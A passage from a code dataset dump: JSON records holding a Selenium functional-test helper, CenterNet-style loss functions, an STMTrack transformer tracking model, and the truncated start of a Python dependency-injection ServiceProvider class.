webdriver.Firefox()\n        # if anything ever goes wrong, after 3s, go ahead and fail right away\n        self.browser.implicitly_wait(3)\n    # after every test, shut down\n    def tearDown(self):\n        self.browser.quit()\n\n    def find_table_row(self, item_text):\n        table = self.browser.find_element_by_id('id_list_table')\n        rows = table.find_elements_by_tag_name('tr')\n        for row in rows:\n            row_text = row.find_elements_by_tag_name('td')[2].text\n            if item_text == row_text:\n                return row\n        self.fail('\"%s\" not in table - \"%s\"' % (item_text, table.text))\n\n    def check_for_row_in_list_table(self, row_text):\n        row = self.find_table_row(row_text)\n        self.assertIsNotNone(row)\n\n        # self.assertIn(row_text + ' Delete', [row.text for row in rows])\n\n    def enter_a_new_item(self, todo_text):\n        inputbox = self.browser.find_element_by_id('id_new_item')\n        inputbox.send_keys(todo_text)\n        
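The functional test above relies on `implicitly_wait`; an explicit-wait variant of the row check (a sketch, not from the original repo, using the same Selenium 3 element-lookup style):

```python
from selenium.webdriver.support.ui import WebDriverWait

def wait_for_row_in_list_table(self, row_text, timeout=3):
    # Poll until the row text shows up in the table, failing after `timeout`.
    WebDriverWait(self.browser, timeout).until(
        lambda driver: any(
            row_text in row.text
            for row in driver.find_element_by_id('id_list_table')
                             .find_elements_by_tag_name('tr')
        )
    )
```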
inputbox.send_keys(Keys.ENTER)\n","repo_name":"Jeanielmj/ottg_tdd","sub_path":"superlists/functional_tests/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":1373,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"7278369214","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport torch\nimport torch.nn as nn\nfrom .utils import _tranpose_and_gather_feat, _tranpose_and_gather_feat_gridneighbor\nimport torch.nn.functional as F\nfrom .utils import gaussian_fit\n\n\ndef _slow_neg_loss(pred, gt):\n    '''focal loss from CornerNet'''\n    pos_inds = gt.eq(1)\n    neg_inds = gt.lt(1)\n\n    neg_weights = torch.pow(1 - gt[neg_inds], 4)\n\n    loss = 0\n    pos_pred = pred[pos_inds]\n    neg_pred = pred[neg_inds]\n\n    pos_loss = torch.log(pos_pred) * torch.pow(1 - pos_pred, 2)\n    neg_loss = torch.log(1 - neg_pred) * torch.pow(neg_pred, 2) * neg_weights\n\n    num_pos = pos_inds.float().sum()\n    pos_loss = pos_loss.sum()\n    neg_loss = neg_loss.sum()\n\n    if pos_pred.nelement() == 0:\n        loss = loss - neg_loss\n    else:\n        loss = loss - (pos_loss + neg_loss) / num_pos\n    return loss\n\n\ndef _neg_loss(pred, gt):\n    ''' Modified focal loss. Exactly the same as CornerNet.\n      Runs faster and costs a little bit more memory\n    Arguments:\n      pred (batch x c x h x w)\n      gt (batch x c x h x w)\n    '''\n    pos_inds = gt.eq(1).float()\n    neg_inds = gt.lt(1).float()\n\n    neg_weights = torch.pow(1 - gt, 4)\n\n    loss = 0\n\n    pos_loss = torch.log(pred) * torch.pow(1 - pred, 2) * pos_inds\n    neg_loss = torch.log(1 - pred) * torch.pow(pred, 2) * neg_weights * neg_inds\n\n    num_pos = pos_inds.float().sum()\n    pos_loss = pos_loss.sum()\n    neg_loss = neg_loss.sum()\n\n    if num_pos == 0:\n        loss = loss - neg_loss\n    else:\n        loss = loss - (pos_loss + neg_loss) / num_pos\n    return loss\n\n\ndef _not_faster_neg_loss(pred, gt):\n    pos_inds = gt.eq(1).float()\n    neg_inds = gt.lt(1).float()\n    num_pos = pos_inds.float().sum()\n    neg_weights = torch.pow(1 - gt, 4)\n\n    loss = 0\n    trans_pred = pred * neg_inds + (1 - pred) * pos_inds\n    weight = neg_weights * neg_inds + pos_inds\n    all_loss = torch.log(1 - trans_pred) * torch.pow(trans_pred, 2) * weight\n    all_loss = all_loss.sum()\n\n    if num_pos > 0:\n        all_loss /= num_pos\n    loss -= all_loss\n    return loss\n\n\ndef _slow_reg_loss(regr, gt_regr, mask):\n    num = mask.float().sum()\n    mask = mask.unsqueeze(2).expand_as(gt_regr)\n\n    regr = regr[mask]\n    gt_regr = gt_regr[mask]\n\n    regr_loss = nn.functional.smooth_l1_loss(regr, gt_regr, size_average=False)\n    regr_loss = regr_loss / (num + 1e-4)\n    return regr_loss\n\n\ndef _reg_loss(regr, gt_regr, mask):\n    ''' L1 regression loss\n    Arguments:\n      regr (batch x max_objects x dim)\n      gt_regr (batch x max_objects x dim)\n      mask (batch x max_objects)\n    '''\n    num = mask.float().sum()\n    mask = mask.unsqueeze(2).expand_as(gt_regr).float()\n\n    regr = regr * mask\n    gt_regr = gt_regr * mask\n\n    regr_loss = nn.functional.smooth_l1_loss(regr, gt_regr, size_average=False)\n    regr_loss = regr_loss / (num + 1e-4)\n    return regr_loss\n\n\ndef multi_gaussian_Kl_divergence(outsigmaW, outsigmaH, outmuW, outmuH, sigmaW_gt, sigmaH_gt):\n    kl_divergence = [0.5 * torch.log((sigmaW_gt[i] ** 2 * sigmaH_gt[i] ** 2) / (outsigmaW[i] * outsigmaH[i])) - 1\n                     + 0.5 * ((outsigmaW[i] / sigmaW_gt[i] ** 2) + (outsigmaH[i] / sigmaH_gt[i] ** 2)) +\n                     0.5 * ((outmuW[i] ** 2 / sigmaW_gt[i] ** 2) + (outmuH[i] ** 2 / sigmaH_gt[i] ** 2))\n                     for i in range(len(outsigmaW))]\n    return 
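A small sanity check of the modified focal loss, assuming `_neg_loss` from the module above is importable: with a single ground-truth-positive cell, only the positive term contributes.

```python
import torch

pred = torch.tensor([[[[0.9]]]])   # one cell, predicted at p = 0.9
gt = torch.tensor([[[[1.0]]]])     # that cell is a positive (gt == 1)

# Positive term of the CornerNet-style loss: -log(p) * (1 - p)^2, averaged
# over num_pos = 1; there are no negative cells, so that is the whole loss.
expected = -(torch.log(pred) * (1 - pred) ** 2).item()
assert abs(_neg_loss(pred, gt).item() - expected) < 1e-6
```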
sum(kl_divergence)\n\n\nclass FocalLoss(nn.Module):\n    '''nn.Module wrapper for focal loss'''\n\n    def __init__(self):\n        super(FocalLoss, self).__init__()\n        self.neg_loss = _neg_loss\n\n    def forward(self, out, target):\n        return self.neg_loss(out, target)\n\n\nclass Focalloss_exphm_and_sigma_KL_divergence(nn.Module):\n    def __init__(self):\n        super(Focalloss_exphm_and_sigma_KL_divergence, self).__init__()\n        self.neg_loss = _neg_loss\n\n    def forward(self, hm_out, hm_gt, ct_ind, sigma_wh, hm_mask, sigmawh_mask):\n        \"\"\"\n        hm_gt : batch * clsnum * output_size * output_size\n        hm_out : batch * clsnum * output_size * output_size\n        ct_ind : batch * clsnum * maxobjsnum * 2\n        sigma_wh : batch * clsnum * maxobjs * 2\n        regmask: batch * maxobjs * 2\n        hm_mask : batch * clsnum * output_size * output_size\n        sigmawh_mask: batch * clsnum * maxobjs\n        \"\"\"\n        #focal_loss_norm = self.neg_loss(torch.clamp((hm_out * hm_mask).sigmoid_(), min=1e-4, max=1 - 1e-4), hm_gt * hm_mask )\n        focal_loss_norm = self.neg_loss(torch.clamp((hm_out * hm_mask), min=1e-6, max=1 - 1e-6), hm_gt * hm_mask)\n        #focal_loss_norm = torch.nn.MSELoss()(torch.clamp((hm_out * hm_mask), min=1e-6, max=1 - 1e-6), hm_gt * hm_mask)\n        #focal_loss_norm = self.neg_loss(torch.clamp((hm_out* hm_mask).sigmoid_(), min=1e-4, max=1 - 1e-4),hm_gt * hm_mask)\n        focal_loss_norm = self.neg_loss(torch.clamp((hm_out).sigmoid_(), min=1e-6, max=1 - 1e-6), hm_gt * hm_mask)\n        # import pdb; pdb.set_trace()\n        batch_channel_sigma_w_list = []\n        batch_channel_sigma_h_list = []\n        batch_channel_mu_w_list = []\n        batch_channel_mu_h_list = []\n        gt_channel_sigma_w_list = []\n        gt_channel_sigma_h_list = []\n\n        for batch in range(hm_out.size(0)):\n            for cls in range(hm_out.size(1)):\n                if int(sigmawh_mask[batch][cls].sum()) > 0:\n                    for obj in range(int(sigmawh_mask[batch][cls].sum())):\n                        if int(sigmawh_mask[batch][cls][obj]) == 1:\n                            x, y = int(ct_ind[batch][cls][obj][0]), int(ct_ind[batch][cls][obj][1])\n                            sigma_w, sigma_h = sigma_wh[batch][cls][obj]\n                            radius_w, radius_h = int((sigma_w * 6 - 1) / 2), int((sigma_h * 6 - 1) / 2)\n                            height, width = hm_out.shape[2:]\n                            left, right = int(min(x, radius_w)), int(min(width - x, radius_w + 1))\n                            top, bottom = int(min(y, radius_h)), int(min(height - y, radius_h + 1))\n\n                            peer_objs_hm_pdfvalue = hm_out.clone()[batch][cls][y - top:y + bottom,\n                                                    x - left:x + right].contiguous().view(-1)\n                            ys, xs = torch.meshgrid((torch.arange(-1 * radius_h, radius_h + 1, 1),\n                                                     torch.arange(-1 * radius_w, radius_w + 1, 1)))\n                            xs = xs.reshape(-1).type_as(peer_objs_hm_pdfvalue).cuda()\n                            ys = ys.reshape(-1).type_as(peer_objs_hm_pdfvalue).cuda()\n                            out_sigmaw, out_sigmah, out_muw, out_muh = gaussian_fit(xs, ys, peer_objs_hm_pdfvalue)\n\n                            if out_sigmaw > 0 and out_sigmah > 0:\n                                batch_channel_sigma_w_list.append(out_sigmaw)\n                                batch_channel_sigma_h_list.append(out_sigmah)\n                                batch_channel_mu_w_list.append(out_muw)\n                                batch_channel_mu_h_list.append(out_muh)\n                                gt_channel_sigma_w_list.append(sigma_w)\n                                gt_channel_sigma_h_list.append(sigma_h)\n        if len(batch_channel_sigma_w_list) != 0:\n            Kl_divergence = multi_gaussian_Kl_divergence(batch_channel_sigma_w_list, batch_channel_sigma_h_list,\n                                                         batch_channel_mu_w_list, batch_channel_mu_h_list,\n                                                         gt_channel_sigma_w_list, gt_channel_sigma_h_list)\n\n            return Kl_divergence, focal_loss_norm\n        else:\n            return None, focal_loss_norm\n\n\nclass RegLoss(nn.Module):\n    '''Regression loss for an output tensor\n    Arguments:\n      output (batch x dim x h x w)\n      mask (batch x max_objects)\n      ind (batch x max_objects)\n      target (batch x max_objects x dim)\n    
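A zero-divergence check for `multi_gaussian_Kl_divergence` above, under the reading that the fitted `out*` values are variances: when the predicted variances equal the squared ground-truth sigmas and the means are zero, the expression reduces to 0 - 1 + 1 + 0 = 0.

```python
import torch

sw, sh = torch.tensor(2.0), torch.tensor(3.0)   # ground-truth sigmas
kl = multi_gaussian_Kl_divergence([sw ** 2], [sh ** 2],
                                  [torch.tensor(0.0)], [torch.tensor(0.0)],
                                  [sw], [sh])
assert torch.allclose(kl, torch.tensor(0.0), atol=1e-6)
```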
'''\n\n    def __init__(self):\n        super(RegLoss, self).__init__()\n\n    def forward(self, output, mask, ind, target):\n        pred = _tranpose_and_gather_feat(output, ind)\n        loss = _reg_loss(pred, target, mask)\n        return loss\n\n\nclass RegL1Loss(nn.Module):\n    def __init__(self):\n        super(RegL1Loss, self).__init__()\n\n    def forward(self, output, mask, ind, target):\n        pred = _tranpose_and_gather_feat(output, ind)\n        mask = mask.unsqueeze(2).expand_as(pred).float()\n        # loss = F.l1_loss(pred * mask, target * mask, reduction='elementwise_mean')\n        loss = F.l1_loss(pred * mask, target * mask, size_average=False)\n        loss = loss / (mask.sum() + 1e-4)\n        return loss\n\n\nclass RegL1loss_gridneighbor(nn.Module):\n    def __init__(self):\n        super(RegL1loss_gridneighbor, self).__init__()\n\n    def forward(self, output, mask, ind, target, mainpoints_list):\n        ##pred: Batch x max_objs x mainpointsnum*2\n        ##output: Batch x mainpointsnum*2 x w x h\n        ##ind: Batch x max_objs x mainpointsnum\n        ##target: Batch x max_objs x 2\n\n        pred = _tranpose_and_gather_feat_gridneighbor(output, ind)\n        mask = mask.unsqueeze(3).expand(mask.size(0), mask.size(1), mask.size(2),\n                                        pred.size(2) // mask.size(2)).contiguous().view(mask.size(0), mask.size(1),\n                                                                                        -1).float()\n        # loss = F.l1_loss(pred * mask, target * mask, reduction='elementwise_mean')\n        loss = 0\n        for point in range(len(mainpoints_list)):\n            loss += F.l1_loss(pred[:, :, point:point + 2] * mask[:, :, point:point + 2],\n                              target[:, :, point:point + 2] * mask[:, :, point:point + 2], size_average=False)\n        loss = loss / (mask.sum() + 1e-4)\n        return loss\n\n\nclass NormRegL1Loss(nn.Module):\n    def __init__(self):\n        super(NormRegL1Loss, self).__init__()\n\n    def forward(self, output, mask, ind, target):\n        pred = _tranpose_and_gather_feat(output, ind)\n        mask = mask.unsqueeze(2).expand_as(pred).float()\n        # loss = F.l1_loss(pred * mask, target * mask, reduction='elementwise_mean')\n        pred = pred / (target + 1e-4)\n        target = target * 0 + 1\n        loss = F.l1_loss(pred * mask, target * mask, size_average=False)\n        loss = loss / (mask.sum() + 1e-4)\n        return loss\n\n\nclass RegWeightedL1Loss(nn.Module):\n    def __init__(self):\n        super(RegWeightedL1Loss, self).__init__()\n\n    def forward(self, output, mask, ind, target):\n        pred = _tranpose_and_gather_feat(output, ind)\n        mask = mask.float()\n        # loss = F.l1_loss(pred * mask, target * mask, reduction='elementwise_mean')\n        loss = F.l1_loss(pred * mask, target * mask, size_average=False)\n        loss = loss / (mask.sum() + 1e-4)\n        return loss\n\n\nclass L1Loss(nn.Module):\n    def __init__(self):\n        super(L1Loss, self).__init__()\n\n    def forward(self, output, mask, ind, target):\n        pred = _tranpose_and_gather_feat(output, ind)\n        mask = mask.unsqueeze(2).expand_as(pred).float()\n        loss = F.l1_loss(pred * mask, target * mask, reduction='elementwise_mean')\n        return loss\n\n\nclass BinRotLoss(nn.Module):\n    def __init__(self):\n        super(BinRotLoss, self).__init__()\n\n    def forward(self, output, mask, ind, rotbin, rotres):\n        pred = _tranpose_and_gather_feat(output, ind)\n        loss = compute_rot_loss(pred, rotbin, rotres, mask)\n        return loss\n\n\ndef compute_res_loss(output, target):\n    return F.smooth_l1_loss(output, target, reduction='elementwise_mean')\n\n\n# TODO: weight\ndef compute_bin_loss(output, target, mask):\n    mask = mask.expand_as(output)\n    output = output * mask.float()\n    return F.cross_entropy(output, target, reduction='elementwise_mean')\n\n\ndef compute_rot_loss(output, target_bin, target_res, mask):\n    # output: (B, 128, 8) [bin1_cls[0], bin1_cls[1], bin1_sin, bin1_cos, \n    #                 
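`_tranpose_and_gather_feat` is imported from `.utils` and not shown here; the sketch below reproduces the usual CenterNet-style behavior it is assumed to have (B x C x H x W features gathered at B x K flat indices into B x K x C):

```python
import torch

def transpose_and_gather_feat(feat, ind):
    # feat: B x C x H x W, ind: B x K flat indices into the H*W grid.
    # Returns B x K x C: the C-dim feature vector at each indexed location.
    B, C, H, W = feat.shape
    feat = feat.permute(0, 2, 3, 1).reshape(B, H * W, C)
    ind = ind.unsqueeze(2).expand(B, ind.size(1), C)
    return feat.gather(1, ind)

feat = torch.arange(2 * 3 * 2 * 2, dtype=torch.float32).view(2, 3, 2, 2)
out = transpose_and_gather_feat(feat, torch.tensor([[0, 3], [1, 2]]))
assert out.shape == (2, 2, 3)
```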
bin2_cls[0], bin2_cls[1], bin2_sin, bin2_cos]\n # target_bin: (B, 128, 2) [bin1_cls, bin2_cls]\n # target_res: (B, 128, 2) [bin1_res, bin2_res]\n # mask: (B, 128, 1)\n # import pdb; pdb.set_trace()\n output = output.view(-1, 8)\n target_bin = target_bin.view(-1, 2)\n target_res = target_res.view(-1, 2)\n mask = mask.view(-1, 1)\n loss_bin1 = compute_bin_loss(output[:, 0:2], target_bin[:, 0], mask)\n loss_bin2 = compute_bin_loss(output[:, 4:6], target_bin[:, 1], mask)\n loss_res = torch.zeros_like(loss_bin1)\n if target_bin[:, 0].nonzero().shape[0] > 0:\n idx1 = target_bin[:, 0].nonzero()[:, 0]\n valid_output1 = torch.index_select(output, 0, idx1.long())\n valid_target_res1 = torch.index_select(target_res, 0, idx1.long())\n loss_sin1 = compute_res_loss(\n valid_output1[:, 2], torch.sin(valid_target_res1[:, 0]))\n loss_cos1 = compute_res_loss(\n valid_output1[:, 3], torch.cos(valid_target_res1[:, 0]))\n loss_res += loss_sin1 + loss_cos1\n if target_bin[:, 1].nonzero().shape[0] > 0:\n idx2 = target_bin[:, 1].nonzero()[:, 0]\n valid_output2 = torch.index_select(output, 0, idx2.long())\n valid_target_res2 = torch.index_select(target_res, 0, idx2.long())\n loss_sin2 = compute_res_loss(\n valid_output2[:, 6], torch.sin(valid_target_res2[:, 1]))\n loss_cos2 = compute_res_loss(\n valid_output2[:, 7], torch.cos(valid_target_res2[:, 1]))\n loss_res += loss_sin2 + loss_cos2\n return loss_bin1 + loss_bin2 + loss_res\n","repo_name":"Wastoon/CenterNet-Multi-Func-Det","sub_path":"src/lib/models/losses.py","file_name":"losses.py","file_ext":"py","file_size_in_byte":13562,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"20892806074","text":"# -*- coding: utf-8 -*\n\nfrom loguru import logger\n\nimport torch\nimport torch.nn.functional as F\nfrom videoanalyst.model.common_opr.common_block import (conv_bn_relu,\n xcorr_depthwise)\nfrom videoanalyst.model.aia_transformer.transformer_impl.position_encoding import PositionEmbeddingSine\nfrom videoanalyst.model.aia_transformer.transformer_impl.transformer import (TransformerEncoderLayer,\n TransformerEncoder) \nfrom videoanalyst.model.module_base import ModuleBase\nfrom videoanalyst.model.task_model.taskmodel_base import (TRACK_TASKMODELS,\n VOS_TASKMODELS)\n\ntorch.set_printoptions(precision=8)\n\n\n@TRACK_TASKMODELS.register\n@VOS_TASKMODELS.register\nclass STMTrack(ModuleBase):\n\n default_hyper_params = dict(pretrain_model_path=\"\",\n head_width=256,\n conv_weight_std=0.01,\n corr_fea_output=False,\n amp=False)\n\n support_phases = [\"train\", \"memorize\", \"track\"]\n\n def __init__(self, backbone_m, backbone_q, neck_m, neck_q, head, loss=None):\n super(STMTrack, self).__init__()\n self.basemodel_m = backbone_m\n self.basemodel_q = backbone_q\n self.neck_m = neck_m\n self.neck_q = neck_q\n self.head = head\n self.loss = loss\n HIDDEN_DIM =256\n N_steps=HIDDEN_DIM // 2\n self.p_e=PositionEmbeddingSine(N_steps, normalize=True)\n MATCH_DIM=64\n self.i_e=PositionEmbeddingSine(MATCH_DIM // 2, normalize=True)\n\n \n encoder_layer = TransformerEncoderLayer(HIDDEN_DIM, \n nhead=4, \n dim_feedforward=1024,\n dropout=0.1, \n activation='relu', \n normalize_before=False,\n divide_norm=False, \n use_AiA=True,\n match_dim=MATCH_DIM, \n feat_size=400)\n encoder_norm = None\n self.encoder = TransformerEncoder(encoder_layer, \n num_layers=2, \n norm=encoder_norm)\n \n\n\n\n\n self._phase = \"train\"\n\n @property\n def phase(self):\n return self._phase\n\n @phase.setter\n def phase(self, p):\n assert p in 
self.support_phases\n self._phase = p\n\n def memorize(self, im_crop,im_mask, fg_bg_label_map):\n fm = self.basemodel_m(im_crop, fg_bg_label_map)\n fm = self.neck_m(fm)\n\n\n fm_mask = F.interpolate(im_mask, size=fm.shape[-2:]).to(torch.bool)\n b,t,h,w=fm_mask.size()\n fm_mask=fm_mask.view(b*t,h,w)\n\n\n fm_pos=self.p_e(fm,fm_mask)\n fm_inr=self.i_e(fm,fm_mask)\n\n\n\n b,c,w,h=fm.size()\n fm=(fm).view(b,c,-1).permute(2, 0, 1).contiguous()\n fm_mask=fm_mask.permute(1,2,0).view(-1,b).contiguous()\n # print(\"fm_pos : \",fm_pos.shape)\n # print(\"b,c,-1 : \",b,c,-1)\n fm_pos=(fm_pos).view(b,c,-1).contiguous().permute(2, 0, 1)\n\n # input()\n _,c1,_,_=fm_inr.size()\n fm_inr=fm_inr.view(b,c1,-1).permute(2, 0, 1).contiguous()\n\n fm=self.encoder(fm, src_key_padding_mask=fm_mask, pos=fm_pos, inr=fm_inr)\n\n fm=fm.permute(1,2,0).view(b,c,w,h)\n fm = fm.permute(1, 0, 2, 3).unsqueeze(0).contiguous() # B, C, T, H, W\n\n\n\n return fm\n\n def train_forward(self, training_data):\n memory_img = training_data[\"im_m\"]\n mask_m=training_data[\"mask_m\"]\n query_img = training_data[\"im_q\"]\n mask_q=training_data[\"mask_q\"]\n\n\n #backbone feature\n assert len(memory_img.shape) == 5\n B, T, C, H, W = memory_img.shape\n\n memory_img = memory_img.view(-1, C, H, W) # no memory copy\n target_fg_bg_label_map = training_data[\"fg_bg_label_map\"].view(-1, 1, H, W)\n\n fm = self.basemodel_m(memory_img, target_fg_bg_label_map)\n fm = self.neck_m(fm) # B * T, C, H, W\n\n fm_mask = F.interpolate(mask_m, size=fm.shape[-2:]).to(torch.bool)\n b,t,h,w=fm_mask.size()\n fm_mask=fm_mask.view(b*t,h,w)\n fm_pos=self.p_e(fm,fm_mask)\n fm_inr=self.i_e(fm,fm_mask)\n\n\n\n\n\n b,c,w,h=fm.size()\n fm=(fm).view(b,c,-1).permute(2, 0, 1).contiguous()\n fm_mask=fm_mask.permute(1,2,0).view(-1,b).contiguous()\n fm_pos=(fm_pos).view(b,c,-1).contiguous().permute(2, 0, 1)\n _,c1,_,_=fm_inr.size()\n fm_inr=fm_inr.view(b,c1,-1).permute(2, 0, 1).contiguous()\n fm=self.encoder(fm, src_key_padding_mask=fm_mask, pos=fm_pos, inr=fm_inr)\n fm=fm.permute(1,2,0).view(b,c,w,h)\n fm = fm.view(B, T, *fm.shape[-3:]).contiguous() # B, T, C, H, W\n fm = fm.permute(0, 2, 1, 3, 4).contiguous() # B, C, T, H, W\n\n\n\n\n\n fq = self.basemodel_q(query_img)\n fq = self.neck_q(fq)\n fq_mask = F.interpolate(mask_q, size=fq.shape[-2:]).to(torch.bool)\n b,t,h,w=fq_mask.size()\n fq_mask=fq_mask.view(b*t,h,w)\n fq_pos=self.p_e(fq,fq_mask)\n fq_inr=self.i_e(fq,fq_mask)\n\n\n b,c,w,h=fq.size()\n fq=(fq).view(b,c,-1).permute(2, 0, 1).contiguous()\n fq_mask=fq_mask.permute(1,2,0).view(-1,b).contiguous()\n\n\n fq_pos=(fq_pos).view(b,c,-1).contiguous().permute(2, 0, 1)\n _,c1,_,_=fq_inr.size()\n fq_inr=fq_inr.view(b,c1,-1).permute(2, 0, 1).contiguous()\n fq=self.encoder(fq, src_key_padding_mask=fq_mask, pos=fq_pos, inr=fq_inr)\n fq=fq.permute(1,2,0).view(b,c,w,h)\n fq_list={}\n\n fq_list[\"fq\"]=fq\n fq_list[\"fq_mask\"]=fq_mask\n fq_list[\"fq_pos\"]=fq_pos\n fq_list[\"fq_inr\"]=fq_inr\n\n fcos_cls_score_final, fcos_ctr_score_final, fcos_bbox_final, corr_fea = self.head(fm, fq_list)\n predict_data = dict(\n cls_pred=fcos_cls_score_final,\n ctr_pred=fcos_ctr_score_final,\n box_pred=fcos_bbox_final,\n )\n if self._hyper_params[\"corr_fea_output\"]:\n predict_data[\"corr_fea\"] = corr_fea\n return predict_data\n\n def forward(self, *args, phase=None):\n if phase is None:\n phase = self._phase\n # used during training\n if phase == 'train':\n # resolve training data\n if self._hyper_params[\"amp\"]:\n with torch.cuda.amp.autocast():\n return self.train_forward(args[0])\n 
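The memorize/train/track paths above all repeat the same reshaping dance before calling the encoder; a shape-only sketch of it with toy sizes (the (B, H·W) padding-mask layout shown is the common transformer convention and is assumed to match this repo's custom encoder):

```python
import torch
import torch.nn.functional as F

B, C, H, W = 2, 256, 20, 20
feat = torch.randn(B, C, H, W)
mask = torch.zeros(B, 1, 320, 320)   # image-level padding mask (float)

# Downsample the mask to the feature grid, as in memorize()/track():
fmask = F.interpolate(mask, size=feat.shape[-2:]).to(torch.bool).squeeze(1)

# Flatten the feature map into a (sequence, batch, channel) token stream:
seq = feat.view(B, C, -1).permute(2, 0, 1).contiguous()   # (H*W, B, C)
key_padding = fmask.view(B, -1)                           # (B, H*W)
assert seq.shape == (H * W, B, C) and key_padding.shape == (B, H * W)
```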
else:\n return self.train_forward(args[0])\n\n elif phase == 'memorize':\n target_img,mask, fg_bg_label_map = args\n fm = self.memorize(target_img,mask, fg_bg_label_map)\n out_list = fm\n\n elif phase == 'track':\n assert len(args) == 3\n search_img,serach_mask, fm = args\n fq = self.basemodel_q(search_img)\n fq = self.neck_q(fq) # B, C, H, W\n\n fq_mask = F.interpolate(serach_mask, size=fq.shape[-2:]).to(torch.bool)\n b,t,h,w=fq_mask.size()\n fq_mask=fq_mask.view(b*t,h,w)\n fq_pos=self.p_e(fq,fq_mask)\n fq_inr=self.i_e(fq,fq_mask)\n b,c,w,h=fq.size()\n fq=(fq).view(b,c,-1).permute(2, 0, 1).contiguous()\n fq_mask=fq_mask.permute(1,2,0).view(-1,b).contiguous()\n fq_pos=(fq_pos).view(b,c,-1).contiguous().permute(2, 0, 1)\n _,c1,_,_=fq_inr.size()\n fq_inr=fq_inr.view(b,c1,-1).permute(2, 0, 1).contiguous()\n fq=self.encoder(fq, src_key_padding_mask=fq_mask, pos=fq_pos, inr=fq_inr)\n fq=fq.permute(1,2,0).view(b,c,w,h)\n fq_list={}\n fq_list[\"fq\"]=fq\n fq_list[\"fq_mask\"]=fq_mask\n fq_list[\"fq_pos\"]=fq_pos\n fq_list[\"fq_inr\"]=fq_inr\n fcos_cls_score_final, fcos_ctr_score_final, fcos_bbox_final, corr_fea = self.head(\n fm, fq_list, search_img.size(-1))\n # apply sigmoid\n fcos_cls_prob_final = torch.sigmoid(fcos_cls_score_final)\n fcos_ctr_prob_final = torch.sigmoid(fcos_ctr_score_final)\n # apply centerness correction\n fcos_score_final = fcos_cls_prob_final * fcos_ctr_prob_final\n\n extra = dict()\n # output\n out_list = fcos_score_final, fcos_bbox_final, fcos_cls_prob_final, fcos_ctr_prob_final, extra\n else:\n raise ValueError(\"Phase non-implemented.\")\n\n return out_list\n\n def update_params(self):\n self._make_convs()\n self._initialize_conv()\n super().update_params()\n\n def _make_convs(self):\n head_width = self._hyper_params['head_width']\n\n # feature adjustment\n self.r_z_k = conv_bn_relu(head_width, head_width, 1, 3, 0, has_relu=False)\n self.c_z_k = conv_bn_relu(head_width, head_width, 1, 3, 0, has_relu=False)\n self.r_x = conv_bn_relu(head_width, head_width, 1, 3, 0, has_relu=False)\n self.c_x = conv_bn_relu(head_width, head_width, 1, 3, 0, has_relu=False)\n\n def _initialize_conv(self, ):\n conv_weight_std = self._hyper_params['conv_weight_std']\n conv_list = [\n self.r_z_k.conv, self.c_z_k.conv, self.r_x.conv, self.c_x.conv\n ]\n for ith in range(len(conv_list)):\n conv = conv_list[ith]\n torch.nn.init.normal_(conv.weight,\n std=conv_weight_std) # conv_weight_std=0.01\n\n def set_device(self, dev):\n if not isinstance(dev, torch.device):\n dev = torch.device(dev)\n self.to(dev)\n if self.loss is not None:\n for loss_name in self.loss:\n self.loss[loss_name].to(dev)\n","repo_name":"WayEnSun/HTFormer","sub_path":"videoanalyst/model/task_model/taskmodel_impl/stmtrack_model.py","file_name":"stmtrack_model.py","file_ext":"py","file_size_in_byte":10029,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"7707577462","text":"from abc import abstractmethod\nfrom typing import Any, List, TypeVar, ContextManager, Callable, Iterable\nfrom contextlib import ExitStack, nullcontext\nfrom threading import RLock\nfrom types import MappingProxyType\nfrom logging import getLogger\n\nfrom .err import ServiceNotFoundError\nfrom .symbols import Symbols\nfrom ._servicesmap import ServicesMap\nfrom .ioc_resolver import IServiceInfoResolver, ServiceInfoChainResolver\nfrom .ioc_service_info import (\n LifeTime,\n IServiceInfo,\n ServiceInfo,\n ProviderServiceInfo,\n GetAttrServiceInfo,\n ValueServiceInfo,\n GroupedServiceInfo,\n 
BindedServiceInfo,\n CallerFrameServiceInfo\n)\nfrom ._utils import wrap_signature as _wrap_signature\n\n_T = TypeVar(\"_T\")\n\n_logger = getLogger(__name__)\n\n\nclass IServiceProvider:\n '''\n the base interface for `ServiceProvider`.\n '''\n\n @abstractmethod\n def __getitem__(self, key):\n raise NotImplementedError\n\n @abstractmethod\n def get(self, key, d=None) -> Any:\n '''\n get a service by key.\n '''\n raise NotImplementedError\n\n @abstractmethod\n def get_many(self, key) -> List[Any]:\n '''\n get services by key.\n '''\n raise NotImplementedError\n\n @abstractmethod\n def scope(self):\n '''\n create a scoped service provider for get scoped services.\n '''\n raise NotImplementedError\n\n\nclass ServiceProvider(IServiceProvider):\n def __init__(self, auto_enter=False, *,\n # internal uses:\n _services: ServicesMap=None, _parent: 'ServiceProvider'=None\n ):\n\n self._exit_stack = None\n self._scoped_cache = {}\n self._parent = _parent\n\n assert (_parent is None) is (_services is None)\n\n if _parent is not None:\n # scope provider\n assert auto_enter is False, 'must be default value'\n self._services = _services\n self._root: ServiceProvider = _parent._root\n self._lock = nullcontext()\n\n else:\n # root provider\n self._services = ServicesMap()\n self._root: ServiceProvider = self\n self._lock = RLock()\n\n provider_service_info = ProviderServiceInfo()\n self._services[Symbols.provider] = provider_service_info\n self._services[Symbols.provider_root] = ValueServiceInfo(self)\n self._services[Symbols.provider_parent] = GetAttrServiceInfo('_parent')\n self._services[Symbols.cache] = GetAttrServiceInfo('_scoped_cache')\n self._services[Symbols.missing_resolver] = ValueServiceInfo(ServiceInfoChainResolver())\n self._services[Symbols.caller_frame] = CallerFrameServiceInfo()\n\n self.__init_hooks = []\n self.__init_exc = None\n\n # service alias\n self._services['ioc'] = provider_service_info\n self._services['provider'] = provider_service_info\n self._services['service_provider'] = provider_service_info\n self._services[ServiceProvider] = provider_service_info\n self._services[IServiceProvider] = provider_service_info\n\n # options\n self._services[Symbols.provider_options] = ValueServiceInfo(MappingProxyType(\n dict(\n auto_enter=auto_enter\n )\n ))\n\n assert self._root is not None\n\n def add_init_hook(self, func: Callable):\n func = _wrap_signature(func)\n if self.__init_hooks is not None:\n with self._lock:\n if self.__init_hooks is not None:\n self.__init_hooks.append(func)\n return\n raise RuntimeError('Cannot add init hook after initialized.')\n\n def __ensure_init_hooks_called(self):\n if self.__init_hooks is not 